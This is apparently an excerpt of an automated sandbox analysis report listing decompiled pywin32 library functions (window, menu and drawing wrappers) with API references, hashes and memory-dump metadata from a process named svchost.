                            • ?PyWinObject_FromHANDLE@@YAPAU_object@@PAX@Z.PYWINTYPES38(00000000), ref: 6DA9179A
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DA917A6
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: Object_$U_object@@$Eval_Thread$Arg_CreateFreeFromParseRestoreSaveTimerTupleWaitable
                            • String ID: CreateWaitableTimer$OiO:CreateWaitableTimer
                            • API String ID: 23462941-3919842845
                            • Opcode ID: 52c63c0b60a3743ff9d38f330805ecebc3b01a1acfff0b9265ea792c4a7cd1b6
                            • Instruction ID: 973fa274227d9bf50e6379ae9b6f0f8b27e45b2ff46849a43b0bbf20598a7360
                            • Opcode Fuzzy Hash: 52c63c0b60a3743ff9d38f330805ecebc3b01a1acfff0b9265ea792c4a7cd1b6
                            • Instruction Fuzzy Hash: 7D212535028301AFDB005B58DC48BAF7BF8FF99314F508425F864D51A0EB75C06A8B5A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAD490, Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 69threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OOO:EnumPropsEx,?,?,?), ref: 6DAAD4AB
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAD4C1
                            • PyCallable_Check.PYTHON38 ref: 6DAAD4D1
                            • PyErr_SetString.PYTHON38(6E28ED8C,EnumFunc must be callable), ref: 6DAAD4EA
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAD50A
                            • EnumPropsExW.USER32(?,Function_0000D3A0,?), ref: 6DAAD520
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAD529
                            • PyErr_Occurred.PYTHON38 ref: 6DAAD538
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(EnumPropsEx,00000000), ref: 6DAAD548
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Err_Eval_ThreadU_object@@$Arg_Callable_CheckEnumError@@Object_OccurredParsePropsRestoreSaveStringTupleWin_
                            • String ID: EnumFunc must be callable$EnumPropsEx$OOO:EnumPropsEx
                            • API String ID: 2351894313-3429847841
                            • Opcode ID: ed46a6bc555f3ecbf8d8cca775f6447b02c32daa306b113381fa0e272324d787
                            • Instruction ID: 51032eef8eb96be7c8b245db3f37b0836b991a3d66e0a8d3e02db8e2bd21c467
                            • Opcode Fuzzy Hash: ed46a6bc555f3ecbf8d8cca775f6447b02c32daa306b113381fa0e272324d787
                            • Instruction Fuzzy Hash: E1213E7590C306AFDB00AF69CC48A5A77F8BF85601F488625FD85C2132F731D966CBA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB7500, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 67COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:SetParent,?), ref: 6DAB7525
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7546
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB7558
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_ParseTuple
                            • String ID: OO:SetParent$SetParent
                            • API String ID: 1248562531-3771438241
                            • Opcode ID: 362fbf9bb2d603b02e1a3793b5d42133ff77647de2babcf3c3c2b798972c5e6c
                            • Instruction ID: 58aa387a4db933f8340292b3399bae67bcad33d795c6998f15d9797ac73fe632
                            • Opcode Fuzzy Hash: 362fbf9bb2d603b02e1a3793b5d42133ff77647de2babcf3c3c2b798972c5e6c
                            • Instruction Fuzzy Hash: C71172758083126FEB00AF28CC45BBB36BCEF80205F488A69F855C1121F77195579AA2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB8170, Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 64threadCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO:ChildWindowFromPoint,?), ref: 6DAB8195
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB81B1
                            • ?PyWinObject_AsPOINT@@YAHPAU_object@@PAUtagPOINT@@@Z.PYWINTYPES38(?,?), ref: 6DAB81C7
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB81D6
                            • SetLastError.KERNEL32(00000000), ref: 6DAB81E0
                            • ChildWindowFromPoint.USER32 ref: 6DAB81F2
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB81FB
                            • GetLastError.KERNEL32 ref: 6DAB8208
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ChildWindowFromPoint,00000000), ref: 6DAB8218
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$ErrorEval_LastObject_Thread$Arg_ChildError@@FromParsePointRestoreSaveT@@@TupleUtagWin_Window
                            • String ID: ChildWindowFromPoint$OO:ChildWindowFromPoint
                            • API String ID: 1464544560-2091561692
                            • Opcode ID: 999f4b13a80c41bc7c526b3da3a0a9a15908b3ae8a773a50f49e1908d0b14f27
                            • Instruction ID: cc6c47aeadfdb72584f4158f2c348f32df97d969d3a70fc57ea978f62c60725a
                            • Opcode Fuzzy Hash: 999f4b13a80c41bc7c526b3da3a0a9a15908b3ae8a773a50f49e1908d0b14f27
                            • Instruction Fuzzy Hash: 6911517540C202AFDB006F68DC49B6B3BB9EF85341F488538F959C1131E735C96B9AA7
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAEDF0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 97COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiiiOiiiiO:StretchBlt,?,?,?,?,?,?,?,?,?,?), ref: 6DAAEE4A
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEE6B
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAEE7D
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAEE8A
                            • PyErr_Occurred.PYTHON38 ref: 6DAAEE9A
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiiiiOiiiiO:StretchBlt$StretchBlt
                            • API String ID: 3610075487-1755100787
                            • Opcode ID: 1c0379210ccc11abeb0d2b38336187872fea625caeb5d37c99ef39ce223774c2
                            • Instruction ID: dd04915ca51470fdb36db5fc158211cfb749aa5af493d58f9ed81d383b23ad3b
                            • Opcode Fuzzy Hash: 1c0379210ccc11abeb0d2b38336187872fea625caeb5d37c99ef39ce223774c2
                            • Instruction Fuzzy Hash: 3B31307240C345AFCB019F54CC44EABBBF9BF89250F484A29F995C2120E731DA599B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA8190, Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 96COMMON
                            Download Yara Rule
                            APIs
                            • PyErr_Format.PYTHON38(6E2925BC,%s is not available on this platform,TransparentBlt), ref: 6DAA81AD
                            • PyArg_ParseTuple.PYTHON38(?,OiiiiOiiiiI:TransparentBlt,?,?,?,?,?,?,?,?,?,?,?), ref: 6DAA81FA
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_FormatParseTuple
                            • String ID: %s is not available on this platform$OiiiiOiiiiI:TransparentBlt$TransparentBlt$TransparentBlt
                            • API String ID: 361908667-111053931
                            • Opcode ID: 5c5e810fbbc9c100c185f04d21e9bb7a359dab7a099caaba205f72efddae0f9c
                            • Instruction ID: c38cc349536c56844544d32cff6a1784722f84544204af2bdc65942a7f90680d
                            • Opcode Fuzzy Hash: 5c5e810fbbc9c100c185f04d21e9bb7a359dab7a099caaba205f72efddae0f9c
                            • Instruction Fuzzy Hash: A231527240C345AFCB019B54CC80DEB7BFDBF89344F484A29F99582130E732D56A9B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAECD0, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 91COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiiiOiiO:BitBlt,?,?,?,?,?,?,?,?), ref: 6DAAED20
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAED41
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAED53
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAED60
                            • PyErr_Occurred.PYTHON38 ref: 6DAAED70
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: BitBlt$OiiiiOiiO:BitBlt
                            • API String ID: 3610075487-2522464790
                            • Opcode ID: a57d6f7c78a82f4fcdd89b1983cd1b4a3bd506868e376a822d94ffeccda1fb39
                            • Instruction ID: 6730a87d42f5a22df9a356a439f6c1d2bc77ef29c4d4cd5140c23b39617c1bc2
                            • Opcode Fuzzy Hash: a57d6f7c78a82f4fcdd89b1983cd1b4a3bd506868e376a822d94ffeccda1fb39
                            • Instruction Fuzzy Hash: B1315272508305AFDB01DF64CC80FABBBF8BF89350F484A29F985C2120E771D6599B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DA91E10, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 85COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Ol:ReleaseSemaphore,?,?), ref: 6DA91E2D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DA91E49
                            • ReleaseSemaphore.KERNEL32(?,?,?), ref: 6DA91E63
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ReleaseSemaphore,00000000), ref: 6DA91E73
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481614905.000000006DA91000.00000020.00020000.sdmp, Offset: 6DA90000, based on PE: true
                            • Associated: 00000013.00000002.481607442.000000006DA90000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481622617.000000006DA94000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481629043.000000006DA96000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481635267.000000006DA98000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6da90000_svchost.jbxd
                            Similarity
                            • API ID: U_object@@$Arg_Error@@Object_ParseReleaseSemaphoreTupleWin_
                            • String ID: Ol:ReleaseSemaphore$ReleaseSemaphore
                            • API String ID: 809431317-858305659
                            • Opcode ID: ffa3d1c64c2a32a79cc5894b19feed0442926fb8102fd139b2a9aeedef4fdbf8
                            • Instruction ID: 66ed70c63fcd5970256965329a278218091e63c6d2a652c860e87c557b63bc83
                            • Opcode Fuzzy Hash: ffa3d1c64c2a32a79cc5894b19feed0442926fb8102fd139b2a9aeedef4fdbf8
                            • Instruction Fuzzy Hash: 8021367952C2016FDB005B28CC85B7B3BFCFF99215F484424F828CA251FB35C9669A6A
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAD950, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 84COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiOO:PostThreadMessage,?,?,?), ref: 6DAAD987
                            • PyLong_AsUnsignedLongMask.PYTHON38(?), ref: 6DAAD99D
                            • PyErr_Occurred.PYTHON38 ref: 6DAAD9AD
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Arg_Err_LongLong_MaskOccurredParseTupleUnsigned
                            • String ID: OiOO:PostThreadMessage$PostThreadMessage
                            • API String ID: 3166690688-202928148
                            • Opcode ID: 0b2c43a83292d8c76b999f42b96dc0474a3516134b82fb0c84639f6db4c26bd0
                            • Instruction ID: 1c1f9b066ee31e32024dbc342a46dd9234a967da9ac9563940a3d57e7754632e
                            • Opcode Fuzzy Hash: 0b2c43a83292d8c76b999f42b96dc0474a3516134b82fb0c84639f6db4c26bd0
                            • Instruction Fuzzy Hash: F521A67540C305AFDB00AF28DC81BAA77F8FF84261F484A29FC8482121E735D95A9A93
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAA8C20, Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 84threadwindowCOMMON
                            Download Yara Rule
                            C-Code - Quality: 37%
                            			E6DAA8C20(intOrPtr _a8) {
				char _v4;
				struct HWND__* _v8;
				int _v12;
				void _v16;
				char* _t15;
				struct HWND__** _t16;
				void _t18;
				long _t21;
				void* _t26;
				struct HWND__** _t27;
				void* _t31;
				void* _t32;
				void* _t35;
				long _t37;

				_v16 = 0;
				_t15 =  &_v4;
				__imp__PyArg_ParseTuple(_a8, "Oi|i", _t15,  &_v12,  &_v16);
				if(_t15 != 0) {
					_t16 =  &_v8;
					__imp__?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z(_v4, _t16);
					if(_t16 == 0) {
						goto L1;
					} else {
						__imp__PyEval_SaveThread(_t31, _t35, _t26);
						_t27 = _t16;
						_t18 = _v16;
						if(_t18 == 0) {
							_t18 = SendMessageW(_v8, 0xc1, _v12, 0) + 1;
							_v16 = _t18;
						}
						_t32 = malloc(_t18 + _t18);
						 *_t32 = _v16;
						_t21 = SendMessageW(_v8, 0xc4, _v12, _t32);
						_t37 = _t21;
						__imp__PyEval_RestoreThread(_t27);
						if(_t37 != 0) {
							__imp__?PyWinObject_FromOLECHAR@@YAPAU_object@@PB_WH@Z(_t32, _t37);
							free(_t32);
							return _t21;
						} else {
							 *__imp___Py_NoneStruct =  *__imp___Py_NoneStruct + 1;
							free(_t32);
							return __imp___Py_NoneStruct;
						}
					}
				} else {
					L1:
					return 0;
				}
			}

















                            0x6daa8c26
                            0x6daa8c33
                            0x6daa8c41
                            0x6daa8c4c
                            0x6daa8c54
                            0x6daa8c5d
                            0x6daa8c68
                            0x00000000
                            0x6daa8c6a
                            0x6daa8c6d
                            0x6daa8c79
                            0x6daa8c7b
                            0x6daa8c81
                            0x6daa8c94
                            0x6daa8c95
                            0x6daa8c95
                            0x6daa8ca9
                            0x6daa8cac
                            0x6daa8cbb
                            0x6daa8cbe
                            0x6daa8cc0
                            0x6daa8ccb
                            0x6daa8cef
                            0x6daa8cfb
                            0x6daa8d0c
                            0x6daa8ccd
                            0x6daa8cd3
                            0x6daa8cdb
                            0x6daa8cec
                            0x6daa8cec
                            0x6daa8ccb
                            0x6daa8c4e
                            0x6daa8c4e
                            0x6daa8c53
                            0x6daa8c53

                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,Oi|i,?,?), ref: 6DAA8C41
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAA8C5D
                            • PyEval_SaveThread.PYTHON38 ref: 6DAA8C6D
                            • SendMessageW.USER32(?,000000C1,?,00000000), ref: 6DAA8C92
                            • malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6DAA8C9C
                            • SendMessageW.USER32(?,000000C4,?,00000000), ref: 6DAA8CBB
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAA8CC0
                            • free.API-MS-WIN-CRT-HEAP-L1-1-0(00000000), ref: 6DAA8CDB
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Eval_MessageSendThread$Arg_Object_ParseRestoreSaveTupleU_object@@freemalloc
                            • String ID: Oi|i
                            • API String ID: 3299793873-315721950
                            • Opcode ID: 3a515adfe627fb60f590d1a72913fc40abedc2dcdf72adb2694c5fdebcdb384a
                            • Instruction ID: 714c6b0ec36525474c2304a8c58390925514dfdd2392a8ed7e6e10ca12cc20dd
                            • Opcode Fuzzy Hash: 3a515adfe627fb60f590d1a72913fc40abedc2dcdf72adb2694c5fdebcdb384a
                            • Instruction Fuzzy Hash: 7F21B575508301AFDB009F28CC85BAB7BB8FF85655F444629FD45D3221E33998268BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB2DE0, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 75COMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:InsertMenuItem,?,?,?), ref: 6DAB2E0F
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB2E2B
                            • PyObject_AsReadBuffer.PYTHON38(?,?,?), ref: 6DAB2E46
                            • PyErr_Format.PYTHON38(6E28ED8C,Argument must be a %d-byte string/buffer (got %d bytes),00000030,?), ref: 6DAB2E6B
                            Strings
                            • InsertMenuItem, xrefs: 6DAB2EAC
                            • OiiO:InsertMenuItem, xrefs: 6DAB2E06
                            • Argument must be a %d-byte string/buffer (got %d bytes), xrefs: 6DAB2E64
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_$Arg_BufferErr_FormatParseReadTupleU_object@@
                            • String ID: Argument must be a %d-byte string/buffer (got %d bytes)$InsertMenuItem$OiiO:InsertMenuItem
                            • API String ID: 3170462299-1297077191
                            • Opcode ID: e607909529ef04b76fbf1b082450135cedf615b70ab8a182811de1299e3c1f70
                            • Instruction ID: 55d2f30418833c8184b1eb26bc7377a2cb270030e6e03099bbc47976d8b6badb
                            • Opcode Fuzzy Hash: e607909529ef04b76fbf1b082450135cedf615b70ab8a182811de1299e3c1f70
                            • Instruction Fuzzy Hash: 62218E75408201AFCB019F55CC84B6B7BF8FF84301F488A69F845C1131E7319A6B9BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB3510, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 75threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiiO:InsertMenu,?,?,?,?,?), ref: 6DAB354D
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB3569
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000001,00000001,00000000), ref: 6DAB3583
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB3592
                            • InsertMenuW.USER32(?,?,?,?,?), ref: 6DAB35AE
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB35B7
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAB35C8
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(InsertMenu,00000000), ref: 6DAB35D4
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$Arg_Error@@FreeInsertMenuParseRestoreSaveTupleWin_
                            • String ID: InsertMenu$OiiiO:InsertMenu
                            • API String ID: 3412221406-3830871062
                            • Opcode ID: 1179cc9b427473c1a781553c99b5b2cd86fc73924ea117e3fa357b2fd9fc17b9
                            • Instruction ID: 43da9e257f78ecea9eeb762cd728066803a1dec6a14084059611700fe17315a8
                            • Opcode Fuzzy Hash: 1179cc9b427473c1a781553c99b5b2cd86fc73924ea117e3fa357b2fd9fc17b9
                            • Instruction Fuzzy Hash: 17215175408301AFDB019F14CC45B6B7BB8FF84355F448A29F989D1131E731D66A8BA3
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAB3420, Relevance: 19.3, APIs: 9, Strings: 2, Instructions: 72threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OiiO:AppendMenu,?,?,?,?), ref: 6DAB3458
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAB3474
                            • ?PyWinObject_AsWCHAR@@YAHPAU_object@@PAPA_WHPAK@Z.PYWINTYPES38(?,00000000,00000000,00000000), ref: 6DAB348E
                            • PyEval_SaveThread.PYTHON38 ref: 6DAB349D
                            • AppendMenuW.USER32 ref: 6DAB34B5
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAB34BE
                            • ?PyWinObject_FreeWCHAR@@YAXPA_W@Z.PYWINTYPES38(?), ref: 6DAB34CF
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(AppendMenu,00000000), ref: 6DAB34DB
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.481647964.000000006DAA1000.00000020.00020000.sdmp, Offset: 6DAA0000, based on PE: true
                            • Associated: 00000013.00000002.481642496.000000006DAA0000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481665588.000000006DABB000.00000002.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481683718.000000006DAC6000.00000004.00020000.sdmp Download File
                            • Associated: 00000013.00000002.481693935.000000006DACA000.00000002.00020000.sdmp Download File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_6daa0000_svchost.jbxd
                            Similarity
                            • API ID: Object_U_object@@$Eval_Thread$AppendArg_Error@@FreeMenuParseRestoreSaveTupleWin_
                            • String ID: AppendMenu$OiiO:AppendMenu
                            • API String ID: 3528935396-2351365262
                            • Opcode ID: 588f23f5c030743b65cba3744a6042371f4a660459172ad532badb57faeba767
                            • Instruction ID: 1666a74ec278eaec1243563c4fc31202f9ec135bac25c39b147e6f959c61a1aa
                            • Opcode Fuzzy Hash: 588f23f5c030743b65cba3744a6042371f4a660459172ad532badb57faeba767
                            • Instruction Fuzzy Hash: 6B217C75408302AFDB01AF19CC49B6B7BB8FF84351F448969F989D1131E731D9AB8B92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Function 6DAAB8F0, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 70threadwindowCOMMON
                            Download Yara Rule
                            APIs
                            • PyArg_ParseTuple.PYTHON38(?,OO|O:ListView_SortItemsEx,?,?,?), ref: 6DAAB914
                            • ?PyWinObject_AsHANDLE@@YAHPAU_object@@PAPAX@Z.PYWINTYPES38(?,?), ref: 6DAAB92E
                            • PyCallable_Check.PYTHON38 ref: 6DAAB942
                            • PyErr_Format.PYTHON38(6E28ED8C,2nd param must be callable (got type %s),?), ref: 6DAAB964
                            • PyEval_SaveThread.PYTHON38 ref: 6DAAB97F
                            • SendMessageW.USER32(?,00001051,?,Function_0000B720), ref: 6DAAB99A
                            • PyEval_RestoreThread.PYTHON38(00000000), ref: 6DAAB9A3
                            • ?PyWin_SetAPIError@@YAPAU_object@@PADJ@Z.PYWINTYPES38(ListView_SortItemsEx,00000000), ref: 6DAAB9B9
                            Strings
                            • 2nd param must be callable (got type %s), xrefs: 6DAAB95D
                            • ListView_SortItemsEx, xrefs: 6DAAB9B4
                            • OO|O:ListView_SortItemsEx, xrefs: 6DAAB90B
                            Memory Dump Source
